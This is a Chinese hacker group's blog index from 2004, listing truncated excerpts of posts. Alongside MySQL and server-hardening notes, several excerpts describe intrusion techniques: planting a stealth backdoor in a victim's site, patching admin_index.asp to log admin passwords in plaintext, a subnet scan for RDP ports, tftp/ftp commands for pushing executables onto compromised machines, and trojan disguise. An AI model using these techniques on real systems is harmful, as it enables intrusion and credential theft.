- 博客(30)
- 收藏
- 关注
RSS订阅原创 欢迎光临 X.U.S.T 小组网站 !
小组新站 www.myxust.net 欢迎访问本Blog已停止更新,最新消息请访问:http://www.myxust.net :)点歌排行榜排名歌曲名1老鼠爱大米2两只蝴蝶3冲动的惩罚4我们的爱5新年好6喜洋洋7七里香8常回家看看92002年的第一场雪10步步高歌曲TOP500排名歌曲名1老鼠爱大米2两只蝴蝶3知道不知道?4别说我的眼泪你无所谓5江南(林俊杰)6孤单北半球7吻别(张学友)8情人
2005-01-22 14:42:00
1693
原创 在Windows中安装Apache2和PHP4的权威指南
作者:周靖 译 来源:ZDNet Apache 2和PHP是创建交互式网站的流行方案,而且成本很低。在Windows中安装Apache 2是一件轻而易举的事情,但要使PHP 4与Apache 2配合无间地运行,就需要一定的技巧。 在PHP 4.3手册的Windows安装小节,没有解释如何让PHP与Apache 2配合使用,而有关Apache 2安装的小节缺失了你需要的大量信息。在网上公
2004-12-07 22:34:00
1495
1
原创 X.U.S.T原创:自己搭建IIS找ASP程序漏洞
自己搭建IIS找ASP程序漏洞作者:X.U.S.T 老师兴高采烈:各位菜鸟,“老师轮流做,今天到我家”,现在轮到我给大家讲课了,还不赶快欢迎?! 众学生:晕,说的这么轻松,轮到你做老师?凭什么啊? 老师怒曰:凭什么?哼哼,不给你们点颜色看看你们不知道我可以做老师!小A、小K,看你们两个的表情,是不是不服啊?信不信我现在把你们两个的个人主页DDoS了? 小A和小K:汗……个人主页都要
2004-12-07 21:32:00
2382
1
原创 X.U.S.T的《自己搭建IIS找ASP程序漏洞》发表在《黑客X档案》,稿费捐给希望工程
文章作者:X.U.S.T(ABEND发现漏洞,Lindows执笔)文章题目:《自己搭建IIS找ASP程序漏洞》发表杂志:国内知名黑客媒体——《黑客X档案》其它说明:稿费捐给希望工程,世界上多一些爱!
2004-12-07 21:12:00
1379
原创 做了个统一的页面,方便以后使用,记得先备份原版首页再添加这个页面哦!
X.U.S.T#fps0 {line-height: 150%; margin-top: 0; margin-bottom: 0}#fps1 {font-size: 9pt}--> Sorry , this website is hacked ! 非常抱歉
2004-11-27 22:24:00
1593
4
原创 初探虚拟主机的集群系统
面对现在的ddos和黑客数据的破坏,及服务器自身的故障,集群系统将大幅提高服务器的安全性。我们在入侵虚拟主机的过程中,经常有一些不可思议的事情发生,如,明明将文件写入服务器,可是在web上就是找不到。我们面对的高性能虚拟主机其实并不是一台服务器,而是一个集群。集群中主机的互连并不是象局域网这么简单的,他们通过集群技术Cluster和集群软件实现数据的同步,内存的同步等等。1、 集群的基本概
2004-11-16 18:40:00
1864
3
原创 SQL注入路径问题 作者:孤光剑隐
下午没什么事情 看了看angel写一个路径的问章 找了肉鸡试了半天 费了牛劲了 我发现如果出现 Microsoft OLE DB Provider for SQL Server 错误 80040e07 将 varchar 值 #SharedObjects 转换为数据类型为 int 的列时发生语法错误。 /html/showdetail_new.asp,行 9 这样他的方法就不能用了 #必须
2004-11-14 22:38:00
1725
1
原创 跨站Script攻击 Author: Hoky.pRo
每当我们想到黑客的时候,黑客往往是这样一幅画像:一个孤独的人,悄悄进入别人的服务器中,进行破坏或者窃取别人的秘密资料。也许他会更改我们的主页,甚者会窃取客户的信用卡号和密码。另外,黑客还会攻击访问我们网站的客户。与此同时,我们的服务器也成了他的帮凶。微软称这种攻击为"跨站script"攻击。而这种攻击大多数都发生在网站动态产生网页的时侯,但黑客的目标并不是你的网站,而是浏览网站的客户。跨站scri
2004-11-14 22:32:00
1208
原创 JAVASCRIPT加密解密终级指南
文章作者:icyfoxlovelace/冰狐浪子[EST]信息来源:《黑客防线》 本文一共介绍了七种方法:一:最简单的加密解密二:转义字符"/"的妙用三:使用Microsoft出品的脚本编码器Script Encoder来进行编码 (自创简单解码)四:任意添加NUL空字符(十六进制00H) (自创)五:无用内容混乱以及换行空格TAB大法六:自写解密函数法七:错误的利用 (自创) 在做网页时(其实
2004-11-14 01:12:00
2197
2
原创 ASP后门之终极伪装
申明:本文已刊登于《黑客X档案》2004年9期,转载请注明。--------------------------- 记得当年asp木马出来的时候号称"永不被杀的木马",呵呵,时至今日,随便什么杀毒软件都能将其杀得片甲不留^_^呵呵,受到木马换壳躲避杀毒软件思路影响,我们也可以给asp木马"加壳"(呵呵,当然不是用UPX等)。还等什么?请往下看。 其实这个思路很简单,就是把asp代码编码,执行时
2004-11-14 00:41:00
2028
1
原创 四川成都攻防大赛技术细节与个人评论
四川成都攻防大赛技术细节与个人评论本文作者:angel文章性质:原创发布日期:2004-11-5 估计大家都知道这次成都的“天地杯”网络安全攻防大赛的消息了,既然和网络安全有关,估计不少朋友都想知道其中的技术细节,我就说说其中技术细节。至于和我一起参加比赛的人,都是圈内比较出名的人物,机会、优势几乎都在我们这边了,其他我就暂时不说了。圈内也有不少人知道是我们几个参
2004-11-06 23:15:00
1817
1
原创 用DOS命令扫描一个网段的全部端口,不需要任何工具
在win2000下开一个dos窗口,然后执行 for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389 这样192.168.0.x这个段的所有开放3389端口得主机都会暴露 这条命令执行后 会在任务栏开254个小窗口 然后telnet链接失败的窗口会在大约5秒后自动退出 剩下的窗口就是相对应开放端口的主机了 看一下小窗口的
2004-10-20 19:27:00
2205
1
原创 渗透国内某网络游戏服务器群记实
没什么技术性,只是想说明现状 现在想弄钱的入侵者,似乎热衷于入侵网络游戏服务器,盗出游戏服务器程序或是数据库。国内的网络游戏企业,都应该招受过此损失,有暴露出来的,有没暴露出来的。但游戏企业对安全问题理解都十分片面,狭隘! 当然,不只是网络游戏企业。近一两年来,入侵者乐此不疲,各种商业数据的偷盗在国内几乎快形成一种"圈内产业"。不论是技术性还是行事组织性都与早年不可同日而语。需求与供应在这里似
2004-10-20 10:30:00
8697
26
原创 精解——安全配置 Windows 2000服务器
目前,WIN2000 SERVER是比较流行的服务器操作系统之一,但是要想安全的配置微软的这个操作系统,却不是一件容易的事。本文试图对win2000 SERVER的安全配置进行初步的探讨。 一、定制自己的WIN2000 SERVER: 1.版本的选择:Win2000有各种语言的版本,对于我们来说,可以选择英文版或简体中文版,我强烈建议:在语言不成为障碍的情况下,请一定使用英文版
2004-10-20 10:03:00
1368
1
原创 MY SQL 常用命令
有很多朋友虽然安装好了mysql但却不知如何使用它。在这篇文章中我们就从连接MYSQL、修改密码、增加用户等方面来学习一些MYSQL的常用命令。 一、连接MYSQL。 格式: mysql -h主机地址 -u用户名 -p用户密码 1、例1:连接到本机上的MYSQL。 首先在打开DOS窗口,然后进入目录 mysqlbin,再键入命令mysql -uroot -p,回车后提示你输密码,如
2004-10-20 10:02:00
1172
原创 SQL高手篇:精妙SQL语句介绍
说明:复制表(只复制结构,源表名:a 新表名:b) SQL: select * into b from a where 1 说明:拷贝表(拷贝数据,源表名:a 目标表名:b) SQL: insert into b(a, b, c) select d,e,f from b; 说明:显示文章、提交人和最后回复时间 SQL: select a.title,a.
2004-10-19 01:08:00
1058
原创 插入式免杀后门--将后门放到对方主页里
昨天也不知怎就搞到中国域名网的权限了,搞了很久,有自动备份。转入正题:1.随便找他一个页面,然后把如下内容分开插入到它的主页了,注意一下上下文。内容(fso):"" then %>save Success!" %>Save UnSuccess!" %>最好要分开插入!!这样管理员也不容易发现。2.将下内容保存到本地为一个htm,并把action="#",改成你插入到的页面,再添下绝对路
2004-10-19 01:06:00
1391
1
原创 ASP木马配合Serv-U提升权限图文教程
第一步得到一个webshell,找到一个everone权限目录,把提升权限工具传上去,执行命令 第二步,连上去吧 第三步,当然有的机器有pcanywhere了,像这台 下载下来破解 第四步连上去看看,还是win2003 第五步开3389吧 第六步加个用户。 其实在pcanywhere里边也行 工具下载 http://pic.yt-e.com/
2004-10-19 01:00:00
2544
原创 突破动力文章上传asp的限制
在入侵动力文章系统,成功进入后台后,也许你会发现,它的后台没有上传ASP的功能,因为动力文章系统的文件过滤是直接写在代码里的。我介绍一种突破这种限制的方法。虽然它禁止了上传ASP,但是我们可以直接写代码啊! 推荐版权信息输入框,框框大比较好写一点^_^。注意,动力文章系统是将这里写入的代码以字符串的形式写道Config.asp里的,所以我们直接复制ASP木马的代码是行不通的。
2004-10-19 00:55:00
1898
原创 惊爆:江民公司官方网站今日被黑
今日晚6点左右,笔者访问江民杀毒软件公司官方网站查看最新病毒情况时意外发现,江民公司官方网站主页被黑客篡改为“NND,你们去论坛看看,一片怨声载道,你们干什么去了?! By河马史诗”(如图)。 笔者随后登陆江民公司官方论坛,发现论坛可以正常登陆。 几十分钟后,当笔者在18:57分再次访问江民公司官方网站后,首页已无法显示(如图)。 一同被黑的还有另一家网
2004-10-18 20:11:00
2999
原创 上传方法总结[对入侵很实用]
作者:小虾米 来自:朋友的家现在将本人用于上传的方法进行汇总如下:1. tftp法先在自己某机器上建个tftp服务器,如执行tftpd32.exe,再将文件(sample.exe)上传到别的机器中(肉鸡),肉鸡cmd中执行: tftp -i 服务器ip get sample.exe2. ftp法肉鸡cmd中执行:echo open ftp服务器ip [端口]>ftp.txtecho
2004-10-18 19:57:00
1484
原创 SYMANTEC防火墙内核溢出漏洞利用之安全返回法
作者:SoBeIt 来自:https://www.xfocus.net这个漏洞发生在SYMDNS.SYS中,当处理DNS答复时,由于未检验总域名长度,导致可以输入一超长域名导致溢出,溢出发生在RING0、IRQL = 2(DISPATCH_LEVEL)、 进程PID为0(idle进程)的环境下。 一个DNS报文格式如下: "/xEB/x0B" //报文ID,可以随意设
2004-10-18 19:56:00
935
原创 直接获取Access、SQL Server等数据库数据
直接获取access、SQL Server等数据库数据Author: MixPST,Ph4nt0m Security Teamhttp://www.ph4nt0m.org当使用SQL注入access的时候,经常会遇到密码为中文、猜不到关键字段名这样的问题。使用本技术就能够很快速的解决这样的问题。本技术最低要求有两条:1.使用access数据库的系统存在SQL注入漏洞;mssql数据库也支持
2004-10-18 19:55:00
1414
原创 欢迎CrackJava、deloo、GHOSTKILLER加入XU安全组!
热烈欢迎CrackJava、deloo、和GHOSTKILLER加入XU安全组!XUST力量持续壮大中……不断努力,不断收获!
2004-10-17 22:34:00
1051
6
原创 XU安全组核心人员招收条件
首先你要知道我们是一个以黑客技术、信息与网络安全技术为主的网站,我们的目标是维护网络安全。1、熟悉TCP/IP协议,并且可以熟练使用Windows或者*NIX中任何一种操作系统,并且了解其攻击方法。2、熟练掌握安全维护中常用的工具,并且了解它的工作原理。多数操作可以自己手动完成。3、熟练汇编与反汇编、C/C++、VC++、PERL、JAVA等编程语言中的至少一种。4、熟练多种数据库
2004-10-16 12:59:00
1006
2
原创 MySQL安全问题(匿名用户)的一点心得
前两天在帮朋友整理他的主页空间时候,发现的一点关于MySQL可能大家都会忽略的问题: 我们知道,在安装完MySQL后,它会自动创建一个root用户和一个匿名用户,其初始密码都是空,对于前者,很多参考资料上都会提醒大家要注意及时设定一个密码,而忽略了后者,大概是因为后者默认设定为只能在本机使用的缘故吧。 但如果你的MySQL是要提供给web服务器作数据库服务的,忽略这个匿名用户的代价可能相当惨重,因
2004-10-15 17:34:00
1071
1
原创 修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.CreateObject("Scripting.FileSystemObject") set tsObject = fsoObject.CreateTextFile(Server.MapPath("ok.
2004-10-15 17:18:00
6345
原创 对一个安全设置比较BT的虚拟主机的安全测试
作者:血汉 文章来源:www.qfaq.com前几天无聊时看到一个木马站,然后就对他进行了一番安全测试,发现是在一个虚拟主机上的,而虚拟主机的安全设置又比较高,我今天就把我是怎么进入这个木马站的经过写出来,里面没有设计到什么技术性的东西,只是把这次的思路说下,因为经验才是最重要的! 首先看了下站.发现是动力的系统,看了下版本MyPower Ver3.51,当时还比较新,注入过滤的比较好,上传
2004-10-15 17:09:00
1429
原创 XUST组于2004年10月14日成立!
XUST创始成员: ·ABEND@XUST 色既是空 ·Lindows@XUST 疯狂自恋 ·Perl@XUST 有点儿坏 ·PHP+MYSQL@XUST 继续做梦人员按照字母排列!
2004-10-14 19:19:00
1112
3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人